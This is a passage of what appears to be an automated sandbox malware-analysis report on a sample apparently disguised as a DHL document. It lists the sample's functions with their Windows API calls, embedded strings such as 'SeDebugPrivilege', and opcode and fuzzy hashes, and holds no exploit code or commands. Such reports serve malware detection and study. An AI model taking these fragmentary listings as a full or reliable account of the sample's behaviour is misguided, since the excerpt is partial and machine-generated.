                                                                                  • Instruction Fuzzy Hash: 0511E171564618BFF7106B61EC8AF6A3B2DEB4C766F110425F244AB0A0C9F25C10EBA4
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00928A84,00000B00,?,?), ref: 00928E0C
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E13
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00928A84,00000B00,?,?), ref: 00928E28
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00928A84,00000B00,?,?), ref: 00928E30
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E33
                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00928A84,00000B00,?,?), ref: 00928E43
                                                                                  • GetCurrentProcess.KERNEL32(00928A84,00000000,?,00928A84,00000B00,?,?), ref: 00928E4B
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E4E
                                                                                  • CreateThread.KERNEL32(00000000,00000000,00928E74,00000000,00000000,00000000), ref: 00928E68
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 1957940570-0
                                                                                  • Opcode ID: 97a3fea865031ac2508772dccd5c0d782fde76aff770905da8171514500c6d5e
                                                                                  • Instruction ID: f11369d5a785db0fa316710c0e6733b1fb12d16c35a4d8ec1bf91c90a4946d08
                                                                                  • Opcode Fuzzy Hash: 97a3fea865031ac2508772dccd5c0d782fde76aff770905da8171514500c6d5e
                                                                                  • Instruction Fuzzy Hash: 3E01BFB5654704FFE710AB75EC4DF5B3B6CEB89711F014421FA05DB191CA709800DB20
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                  • API String ID: 2862541840-625585964
                                                                                  • Opcode ID: f9303d62a5f17e675ef67a95e15461d8aefe54ff722aa6e0e24c769ec9607d59
                                                                                  • Instruction ID: d57593983bc782f5075fc739014cef96f70a5f37fa766414b15c8b32f0fa4363
                                                                                  • Opcode Fuzzy Hash: f9303d62a5f17e675ef67a95e15461d8aefe54ff722aa6e0e24c769ec9607d59
                                                                                  • Instruction Fuzzy Hash: 0791CE71A00219AFDF24DFA5C848FAFBBB8EF85314F10855AF915AB290D7749901CFA0
                                                                                  APIs
                                                                                    • Part of subcall function 00927652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?,?,0092799D), ref: 0092766F
                                                                                    • Part of subcall function 00927652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 0092768A
                                                                                    • Part of subcall function 00927652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 00927698
                                                                                    • Part of subcall function 00927652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?), ref: 009276A8
                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00949B1B
                                                                                  • _memset.LIBCMT ref: 00949B28
                                                                                  • _memset.LIBCMT ref: 00949C6B
                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00949C97
                                                                                  • CoTaskMemFree.OLE32(?), ref: 00949CA2
                                                                                  Strings
                                                                                  • NULL Pointer assignment, xrefs: 00949CF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                  • String ID: NULL Pointer assignment
                                                                                  • API String ID: 1300414916-2785691316
                                                                                  • Opcode ID: 12783f523c8c59abdc81a4be2098a1ef59b5089bd80247fee6b28499e61db5dc
                                                                                  • Instruction ID: 6ded148a7491c6cf35c7fa0e22d64ab9ca6963e96ffa69ef9d72a99f3125d426
                                                                                  • Opcode Fuzzy Hash: 12783f523c8c59abdc81a4be2098a1ef59b5089bd80247fee6b28499e61db5dc
                                                                                  • Instruction Fuzzy Hash: ED912571D00229ABDB10DFA5DC81EDEBBB9FF08310F20415AF519A7281EB319A44CFA1
                                                                                  APIs
                                                                                    • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                                                                  • _memset.LIBCMT ref: 00933077
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009330A6
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00933159
                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00933187
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                  • String ID: 0$xU$xU
                                                                                  • API String ID: 4152858687-2120411300
                                                                                  • Opcode ID: 1580dd9cea03dfab155b5de779591c9a22b4572fe75bf3e7719fcecc29705252
                                                                                  • Instruction ID: c86eea49272971f70cb2a76f8726bdb1dfd3f145dfafce95f35c2db333a30eac
                                                                                  • Opcode Fuzzy Hash: 1580dd9cea03dfab155b5de779591c9a22b4572fe75bf3e7719fcecc29705252
                                                                                  • Instruction Fuzzy Hash: 8D51B33165C3009ED725DF68C845A6BB7E8EF85360F048A2EF895D7291DB74CE448F92
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00957093
                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 009570A7
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009570C1
                                                                                  • _wcscat.LIBCMT ref: 0095711C
                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00957133
                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00957161
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                  • String ID: SysListView32
                                                                                  • API String ID: 307300125-78025650
                                                                                  • Opcode ID: 127b7e853cf601c4b0ab1ff59e89a7c68892b16922d1446821f78203dfd6dc07
                                                                                  • Instruction ID: 9a14542ec94d5119e1a729e919f3ab29714d4fe2d76dea6a4c62c2ee179dd868
                                                                                  • Opcode Fuzzy Hash: 127b7e853cf601c4b0ab1ff59e89a7c68892b16922d1446821f78203dfd6dc07
                                                                                  • Instruction Fuzzy Hash: 92418F71A04308ABDB21DFB5DC85BEAB7E8EF48355F10052AF944E7291D6719E888B60
                                                                                  APIs
                                                                                    • Part of subcall function 00933E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00933EB6
                                                                                    • Part of subcall function 00933E91: Process32FirstW.KERNEL32(00000000,?), ref: 00933EC4
                                                                                    • Part of subcall function 00933E91: CloseHandle.KERNEL32(00000000), ref: 00933F8E
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094ECB8
                                                                                  • GetLastError.KERNEL32 ref: 0094ECCB
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094ECFA
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0094ED77
                                                                                  • GetLastError.KERNEL32(00000000), ref: 0094ED82
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0094EDB7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                  • String ID: SeDebugPrivilege
                                                                                  • API String ID: 2533919879-2896544425
                                                                                  • Opcode ID: 32e8e4c9a5c540d11597273d2566aa907e122d45ab22f18c51c135c4d3f6c03b
                                                                                  • Instruction ID: 402ae15890f824f61732231fe888dc0ae156d45b07c96455879a91bfdf089979
                                                                                  • Opcode Fuzzy Hash: 32e8e4c9a5c540d11597273d2566aa907e122d45ab22f18c51c135c4d3f6c03b
                                                                                  • Instruction Fuzzy Hash: 2A419A716042109FDB14EF28CC95F6EB7A5BF80714F088459F9829B2D2DB75A804CB96
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 009332C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoad
                                                                                  • String ID: blank$info$question$stop$warning
                                                                                  • API String ID: 2457776203-404129466
                                                                                  • Opcode ID: 9bf69f6f3b138ceee70dcb1638c52c3e13f1c89f47ae1272e1fb92200a5e6d2b
                                                                                  • Instruction ID: 65321a41cfa93936f875d656da20933b74f40c471a69a8a448506cda3db60a33
                                                                                  • Opcode Fuzzy Hash: 9bf69f6f3b138ceee70dcb1638c52c3e13f1c89f47ae1272e1fb92200a5e6d2b
                                                                                  • Instruction Fuzzy Hash: E2110D3568C34A7BE7015B65DC43C6BB39CEF19374F10402AF52196281D7759B804FB6
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0093454E
                                                                                  • LoadStringW.USER32(00000000), ref: 00934555
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0093456B
                                                                                  • LoadStringW.USER32(00000000), ref: 00934572
                                                                                  • _wprintf.LIBCMT ref: 00934598
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009345B6
                                                                                  Strings
                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00934593
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                  • API String ID: 3648134473-3128320259
                                                                                  • Opcode ID: 3aac6418ffc0a9ba4ed8672e8301c50d40d95b3fc990de2988f763185634a8aa
                                                                                  • Instruction ID: e610336130bf61fbc7b5e7e65021faf231f108b96c94a559c1d02b6fe762bb03
                                                                                  • Opcode Fuzzy Hash: 3aac6418ffc0a9ba4ed8672e8301c50d40d95b3fc990de2988f763185634a8aa
                                                                                  • Instruction Fuzzy Hash: 9A014FF290430CBFE711A7A5DD89EFB776CEB08312F0005A5BB45D2051EA749E858B71
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0095D78A
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0095D7AA
                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0095D9E5
                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0095DA03
                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0095DA24
                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 0095DA43
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0095DA68
                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0095DA8B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                  • String ID:
                                                                                  • API String ID: 1211466189-0
                                                                                  • Opcode ID: a62c733a8c27c6dd6bd197057ebfbbc280bd2563853c3c337bf4095a41342b84
                                                                                  • Instruction ID: c1a592af52ac8a3f0f6028f2c529d71b651ae88c71775d973c8c871f6fa8d8ac
                                                                                  • Opcode Fuzzy Hash: a62c733a8c27c6dd6bd197057ebfbbc280bd2563853c3c337bf4095a41342b84
                                                                                  • Instruction Fuzzy Hash: EDB1DA71602215EFDF24CF6AC9947BE7BB5FF08702F088069EC489B295D734A958CB90
                                                                                  APIs
                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 008D2ACF
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000,000000FF), ref: 008D2B17
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 0090C46A
                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0090C417,00000004,00000000,00000000,00000000), ref: 0090C4D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: 11687efd34c8d2fe11a99ddd3946f3be9bc0ba028fa5f2a3c34f0a8468ae84f5
                                                                                  • Instruction ID: 5d072d1df8b08348e5f202028a72d1a28636aa8208d90dd259fd1d6567c3d8b7
                                                                                  • Opcode Fuzzy Hash: 11687efd34c8d2fe11a99ddd3946f3be9bc0ba028fa5f2a3c34f0a8468ae84f5
                                                                                  • Instruction Fuzzy Hash: FE4105303187949EC7358B298C9CB7A7B96FBA5324F588A1BE047C67B0C675A881E710
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0093737F
                                                                                    • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                                                    • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009373B6
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 009373D2
                                                                                  • _memmove.LIBCMT ref: 00937420
                                                                                  • _memmove.LIBCMT ref: 0093743D
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0093744C
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00937461
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00937480
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 256516436-0
                                                                                  • Opcode ID: dffcd77f20d014bd2ec8feaebf608b134b20e09c87378a8ccbaf3ac5ea36d1e3
                                                                                  • Instruction ID: 93a9b1364d1332c2bc019e400f669f7800e52de5d6251c1b7be9e330de07167d
                                                                                  • Opcode Fuzzy Hash: dffcd77f20d014bd2ec8feaebf608b134b20e09c87378a8ccbaf3ac5ea36d1e3
                                                                                  • Instruction Fuzzy Hash: CB317071904205EBCF10DFA9DC89AAFBBB8FF44711F1441A5FA04DB296DB309A10DBA1
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 0095645A
                                                                                  • GetDC.USER32(00000000), ref: 00956462
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095646D
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00956479
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009564B5
                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009564C6
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00959299,?,?,000000FF,00000000,?,000000FF,?), ref: 00956500
                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00956520
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3864802216-0
                                                                                  • Opcode ID: e0ea5ad6c3f838ccb522cf7a8383ad1e352f6648315e4ac1fab88d581ee20708
                                                                                  • Instruction ID: e33fdd96c9e3faa88618f8e00d5f61bf769131c45fd0b87334e33d1ef35aadde
                                                                                  • Opcode Fuzzy Hash: e0ea5ad6c3f838ccb522cf7a8383ad1e352f6648315e4ac1fab88d581ee20708
                                                                                  • Instruction Fuzzy Hash: 97318D72215214BFEF108F11CC4AFEB3FADEF09766F040065FE089A191D6759842CB60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  • Opcode ID: 9a74799085ca5bf9ef76cf30976ef769522fb32bdc085118cba7aae79fe62014
                                                                                  • Instruction ID: 13fcdbe2bd46aad93df2a042b37884b2300dbec41a1d8da2b11f5a516cce8b35
                                                                                  • Opcode Fuzzy Hash: 9a74799085ca5bf9ef76cf30976ef769522fb32bdc085118cba7aae79fe62014
                                                                                  • Instruction Fuzzy Hash: 1D21C5E1684629B7DA14A735AC46FBF339CEF70799B040020FE05D62C7E759DD2181A6
                                                                                  APIs
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                    • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                                                                  • _wcstok.LIBCMT ref: 0093EEFF
                                                                                  • _wcscpy.LIBCMT ref: 0093EF8E
                                                                                  • _memset.LIBCMT ref: 0093EFC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                  • String ID: X
                                                                                  • API String ID: 774024439-3081909835
                                                                                  • Opcode ID: b19f15c42c1cb5ce12e31da4b212a5f7a43445d059a259e5902211fee43f7017
                                                                                  • Instruction ID: 9fca097b5fb82d4c02491ed4d8fc218d1172441cae4f1fde280209cd87557833
                                                                                  • Opcode Fuzzy Hash: b19f15c42c1cb5ce12e31da4b212a5f7a43445d059a259e5902211fee43f7017
